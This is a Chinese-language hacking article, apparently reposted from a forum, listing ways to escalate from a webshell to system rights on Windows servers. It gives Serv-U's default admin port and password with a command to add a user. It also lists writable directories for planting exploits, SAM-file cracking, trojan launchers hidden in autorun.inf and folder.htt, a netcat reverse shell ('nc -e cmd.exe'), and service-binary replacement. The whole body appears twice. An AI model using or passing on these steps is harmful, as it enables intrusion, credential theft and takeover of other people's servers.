服务器 提权方法大全
程序员文章站
2022-03-04 08:29:14
大家是不是拿到了很多webshell.... 但 无法提权....
... 09-09-30...
现在可以说网络管理员对服务器的设置是越来越bt,但bt的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。
首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。
下面我们就进入主题,对webshell的提权方法!
首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些sb的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。
在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起:
1。pcanywhere的提权方法
pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录c:\documents and settings\all users\application data\symantec\pcanywhere\,如果行那就最好了,直接下载它的cif文件,然后使用pcanywhere的密码读取器得到pcanywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。
2。serv-u提权方法
serv-u可以说是网络上比较火的一款ftp服务器软件,有许多像我这样的小黑们都是看系统服务中是否有serv-u的系统进程来进行提权的。serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧!
a.serv-u本地提权:serv-u本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:localadministrator,默认密码:#l@$ak#.lk;0@p,这是集成在serv-u内部的,可以以guest权限来进行连接,对serv-u进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录:
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\prel
c:\program files\java web start\
c:\documents and settings\
c:\documents and settings\all users\documents\
很多时候data目录不行,试试这个很多主机都是erveryone 完全控制!
c:\program files\microsoft sql server\
c:\temp\
c:\mysql\(如果服务器支持php)
c:\php(如果服务器支持php)
上面一些目录就是常见的,不过也不排除一些特殊的,像江民的kv2004对文件夹的权限设置就不是很严格的。
不过针对本地提权是可以防范的,下面是我在xiaolu的文章中节选的:
防止办法和对策:
一般防止方法:设置目录权限,通过去掉web目录iusr用户的执行权限来防止使用webshell来运行exp程序。
对策:这种方法有一定的局限性,需要设置的目录很多,不能有一点疏漏,比如我就发现很多虚拟主机在c:\documents and settings\all users\ documents目录以及下边几个子目录documents没有设置权限,导致可以在这个目录上传并运行exp,这种目录还有x:\php,x:\perl等,因为这种目录都是everyone完全控制的。有些主机还支持php,pl,aspx等,这简直就是服务器的serv-u灾难,^_^,运行程序更加方便。
高级一点的防止办法:修改serv-u管理端口,用ultraedit打开servudaemon.exe查找b6ab(43958的16进制),替换成自己定义的端口比如3930(12345),打开servuadmin.exe找到最后一个b6ab替换成3930(12345),启动serv-u,现在本地管理端口就成了12345了:
tcp 127.0.0.1:12345 0.0.0.0:0 listening
对策:对付这种也很简单,netstat –an,就能看到端口了,有人说netstat无法运行,其实你再上传个netstat.exe到可执行目录运行就ok了,然后修改一下exp编译,上传运行就好了,我修改了一个可以自定义端口的exp,运行格式:
usage: serv-u.exe port "command"
example: serv-u.exe 43958 "net user xl xiaoxue /add"
更高级的防止办法:修改管理员名和密码,用ultraedit打开servudaemon.exe查找ascii:localadministrator,和#l@$ak#.lk;0@p,修改成等长度的其它字符就可以了,servuadmin.exe也一样处理。
对策:这下默认的管理员连接不上了,还有办法么?嘿嘿,有的管理员安装serv-u都是使用默认目录c:\program files\serv-u安装,这个目录虽然不能写,也不能修改,但是默认iusr是可以读的,我们可以用webshell来下载servudaemon.exe,用ultraedit打开分析一下,serv-u的帐号密码就到手了,修改exp编译上传运行,我们又胜利了。
终极防御:
a.设置好目录权限,不要疏忽大意;
b.serv-u最好不要使用默认安装路径,设置serv-u目录的权限,只有管理员才能访问;
c.用我介绍的办法修改serv-u的默认管理员名字和密码,喜欢的话端口也可以改掉。
d.serv-u管理端口定向转发法:这里需要使用的工具是fpipe.exe
我们要知道serv-u默认本地管理端口是:43958,这个是只允许本地ip127.0.0.1进行登陆和管理的,那么我们就想能不能通过端口转向来远程管理呢?所以我们用到fpipe.exe,首先是将fpipe.exe上传至服务器中,然后再cmd下执行
fpipe.exe -v -l 12345-r 43958 127.0.0.1
这里要说明的是,这段字符的意思是当访问12345端口时就会自动转向43958端口,也就是serv-u的管理端口
所以我们在本地安装一个serv-u,
新建一个服务器,填入对方ip,
user:
localadministrator
pass:
#l@$ak#.lk;0@p
连接上后你就可以管理他的serv-u了,剩下的操作就是执行上面提到的方法了!
===================================================
serv-u的方法我就总结出这几个来,可能还有其他的方法我没有看到吧
不过个人认为关键还是本地溢出漏洞的应用要比较多一些,所以网上也常常出现serv-u的本机溢出程序
不同版本的更是层出不穷,前一段时间针对serv-u6.0.2的修改了默认管理员账号和密码的相关文章还请大家参照校园黑客联盟的小鱼修炼中的文章。
serv-u的提权文章就暂时先总结到这里,有更好的方法还请大家回复!
3.autorun方法:这种方法也可以说是比较古老的方法,最初应该是从光盘自动播放中寻找到的灵感吧?不进行细说,给出格式即可
制作一个autoruan.inf文件.内容如下
[autorun]
open=bear.exe
bear.exe为木马程序,与autorun.inf放在同一目录下!
4。sam破解方法: 进入c:\winnt\system32\config\ 下载他的sam文件用lc等破解工具破解。
5。相关脚本提权方法:前面的serv-u的ftp提权中提过的vbs这里再说下.进入c:\documents and settings\all users\「开始」菜单\程序\启动 写入bat或vbs文件。这种方法也是属于守株待兔类的,只有在对方主机重起以后才可以达到目的。
6。nc的反弹提权:这里就要说nc的相关用法了,如果在对方服务器中有足够的权限执行nc的话就好了,把它反弹到自己的电脑上,你就可以进行相关操作了!瑞士军刀具体方法不多说,给出格式,如下:
server:nc -e cmd.exe ip 1234
client: nc -l -p 1234
7。conn等asp文件中泄漏sql帐户密码方法:这种方法说起来应该算是比较侥幸的方法。曾经马俊和我说过一次,原来没有太在意,现在还真的感觉有些好用了,找到账号密码和数据库名在对方没有删除xp_cmdshell条件下用sql连接工具连接即可,连接上后就可以输入你想要的cmd命令了。
8。vnc的相关提权:vnc也是一个类似pcanywhere的远程管理软件,在linux应用广泛,曾经在看*的一些服务器中有很多使用vnc的,方法也是我在网络中学到的,不过在应用中就成功过一次,比较郁闷!方法就转载一下吧,网址:http://www.hxhack.org/article/html/14184.html
还有要补充的就是vnc是可以反向连接的,这个方法我没有试过,只是曾经看影子做过一个视频动画。
9。desktop.ini与folder.htt方法。(此方法是在网络看到的)方法如下:首先建立一个文件夹,进入,在空白处点右键,选择“自定义文件夹”一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为folder
setting的文件架与desktop.ini的文件,如果看不到,就把显示所有文件给选上,然后我们在folder setting目录下找到folder.htt文件,记事本打开,在任意地方加入以下代码:<object id=“runit” width=0 height=0 type=”application/x-oleobject” codebase=“木马名”></object> 然后你将你的木马文件放在folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的木马,此方法也属于类似autorun的守株待兔方法。
10。替换服务提权:我认为比较复杂,不过有些时候也实用,首先是看服务进程,在看我们是否有执行命令的权限,这里要用到的命令是rename,相关用法:
c:\>rename /?
重命名文件。
rename [drive:][path]filename1 filename2.
ren [drive:][path]filename1 filename2.
例如替换c:\kv2004\kv.exe的进程
rename c:\kv2004\kv.exe bear.exe
然后再将我们的本地木马文件命名为kv.exe上传到c:\kv2004\目录下,等待对方重新起动机算机即可!
首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。
下面我们就进入主题,对webshell的提权方法!
首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些sb的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。
在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起:
1。pcanywhere的提权方法
pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录c:\documents and settings\all users\application data\symantec\pcanywhere\,如果行那就最好了,直接下载它的cif文件,然后使用pcanywhere的密码读取器得到pcanywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。
2。serv-u提权方法
serv-u可以说是网络上比较火的一款ftp服务器软件,有许多像我这样的小黑们都是看系统服务中是否有serv-u的系统进程来进行提权的。serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧!
a.serv-u本地提权:serv-u本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:localadministrator,默认密码:#l@$ak#.lk;0@p,这是集成在serv-u内部的,可以以guest权限来进行连接,对serv-u进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录:
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\prel
c:\program files\java web start\
c:\documents and settings\
c:\documents and settings\all users\documents\
很多时候data目录不行,试试这个很多主机都是erveryone 完全控制!
c:\program files\microsoft sql server\
c:\temp\
c:\mysql\(如果服务器支持php)
c:\php(如果服务器支持php)
上面一些目录就是常见的,不过也不排除一些特殊的,像江民的kv2004对文件夹的权限设置就不是很严格的。
不过针对本地提权是可以防范的,下面是我在xiaolu的文章中节选的:
防止办法和对策:
一般防止方法:设置目录权限,通过去掉web目录iusr用户的执行权限来防止使用webshell来运行exp程序。
对策:这种方法有一定的局限性,需要设置的目录很多,不能有一点疏漏,比如我就发现很多虚拟主机在c:\documents and settings\all users\ documents目录以及下边几个子目录documents没有设置权限,导致可以在这个目录上传并运行exp,这种目录还有x:\php,x:\perl等,因为这种目录都是everyone完全控制的。有些主机还支持php,pl,aspx等,这简直就是服务器的serv-u灾难,^_^,运行程序更加方便。
高级一点的防止办法:修改serv-u管理端口,用ultraedit打开servudaemon.exe查找b6ab(43958的16进制),替换成自己定义的端口比如3930(12345),打开servuadmin.exe找到最后一个b6ab替换成3930(12345),启动serv-u,现在本地管理端口就成了12345了:
tcp 127.0.0.1:12345 0.0.0.0:0 listening
对策:对付这种也很简单,netstat –an,就能看到端口了,有人说netstat无法运行,其实你再上传个netstat.exe到可执行目录运行就ok了,然后修改一下exp编译,上传运行就好了,我修改了一个可以自定义端口的exp,运行格式:
usage: serv-u.exe port "command"
example: serv-u.exe 43958 "net user xl xiaoxue /add"
更高级的防止办法:修改管理员名和密码,用ultraedit打开servudaemon.exe查找ascii:localadministrator,和#l@$ak#.lk;0@p,修改成等长度的其它字符就可以了,servuadmin.exe也一样处理。
对策:这下默认的管理员连接不上了,还有办法么?嘿嘿,有的管理员安装serv-u都是使用默认目录c:\program files\serv-u安装,这个目录虽然不能写,也不能修改,但是默认iusr是可以读的,我们可以用webshell来下载servudaemon.exe,用ultraedit打开分析一下,serv-u的帐号密码就到手了,修改exp编译上传运行,我们又胜利了。
终极防御:
a.设置好目录权限,不要疏忽大意;
b.serv-u最好不要使用默认安装路径,设置serv-u目录的权限,只有管理员才能访问;
c.用我介绍的办法修改serv-u的默认管理员名字和密码,喜欢的话端口也可以改掉。
d.serv-u管理端口定向转发法:这里需要使用的工具是fpipe.exe
我们要知道serv-u默认本地管理端口是:43958,这个是只允许本地ip127.0.0.1进行登陆和管理的,那么我们就想能不能通过端口转向来远程管理呢?所以我们用到fpipe.exe,首先是将fpipe.exe上传至服务器中,然后再cmd下执行
fpipe.exe -v -l 12345-r 43958 127.0.0.1
这里要说明的是,这段字符的意思是当访问12345端口时就会自动转向43958端口,也就是serv-u的管理端口
所以我们在本地安装一个serv-u,
新建一个服务器,填入对方ip,
user:
localadministrator
pass:
#l@$ak#.lk;0@p
连接上后你就可以管理他的serv-u了,剩下的操作就是执行上面提到的方法了!
===================================================
serv-u的方法我就总结出这几个来,可能还有其他的方法我没有看到吧
不过个人认为关键还是本地溢出漏洞的应用要比较多一些,所以网上也常常出现serv-u的本机溢出程序
不同版本的更是层出不穷,前一段时间针对serv-u6.0.2的修改了默认管理员账号和密码的相关文章还请大家参照校园黑客联盟的小鱼修炼中的文章。
serv-u的提权文章就暂时先总结到这里,有更好的方法还请大家回复!
3.autorun方法:这种方法也可以说是比较古老的方法,最初应该是从光盘自动播放中寻找到的灵感吧?不进行细说,给出格式即可
制作一个autoruan.inf文件.内容如下
[autorun]
open=bear.exe
bear.exe为木马程序,与autorun.inf放在同一目录下!
4。sam破解方法: 进入c:\winnt\system32\config\ 下载他的sam文件用lc等破解工具破解。
5。相关脚本提权方法:前面的serv-u的ftp提权中提过的vbs这里再说下.进入c:\documents and settings\all users\「开始」菜单\程序\启动 写入bat或vbs文件。这种方法也是属于守株待兔类的,只有在对方主机重起以后才可以达到目的。
6。nc的反弹提权:这里就要说nc的相关用法了,如果在对方服务器中有足够的权限执行nc的话就好了,把它反弹到自己的电脑上,你就可以进行相关操作了!瑞士军刀具体方法不多说,给出格式,如下:
server:nc -e cmd.exe ip 1234
client: nc -l -p 1234
7。conn等asp文件中泄漏sql帐户密码方法:这种方法说起来应该算是比较侥幸的方法。曾经马俊和我说过一次,原来没有太在意,现在还真的感觉有些好用了,找到账号密码和数据库名在对方没有删除xp_cmdshell条件下用sql连接工具连接即可,连接上后就可以输入你想要的cmd命令了。
8。vnc的相关提权:vnc也是一个类似pcanywhere的远程管理软件,在linux应用广泛,曾经在看*的一些服务器中有很多使用vnc的,方法也是我在网络中学到的,不过在应用中就成功过一次,比较郁闷!方法就转载一下吧,网址:http://www.hxhack.org/article/html/14184.html
还有要补充的就是vnc是可以反向连接的,这个方法我没有试过,只是曾经看影子做过一个视频动画。
9。desktop.ini与folder.htt方法。(此方法是在网络看到的)方法如下:首先建立一个文件夹,进入,在空白处点右键,选择“自定义文件夹”一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为folder
setting的文件架与desktop.ini的文件,如果看不到,就把显示所有文件给选上,然后我们在folder setting目录下找到folder.htt文件,记事本打开,在任意地方加入以下代码:<object id=“runit” width=0 height=0 type=”application/x-oleobject” codebase=“木马名”></object> 然后你将你的木马文件放在folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的木马,此方法也属于类似autorun的守株待兔方法。
10。替换服务提权:我认为比较复杂,不过有些时候也实用,首先是看服务进程,在看我们是否有执行命令的权限,这里要用到的命令是rename,相关用法:
c:\>rename /?
重命名文件。
rename [drive:][path]filename1 filename2.
ren [drive:][path]filename1 filename2.
例如替换c:\kv2004\kv.exe的进程
rename c:\kv2004\kv.exe bear.exe
然后再将我们的本地木马文件命名为kv.exe上传到c:\kv2004\目录下,等待对方重新起动机算机即可!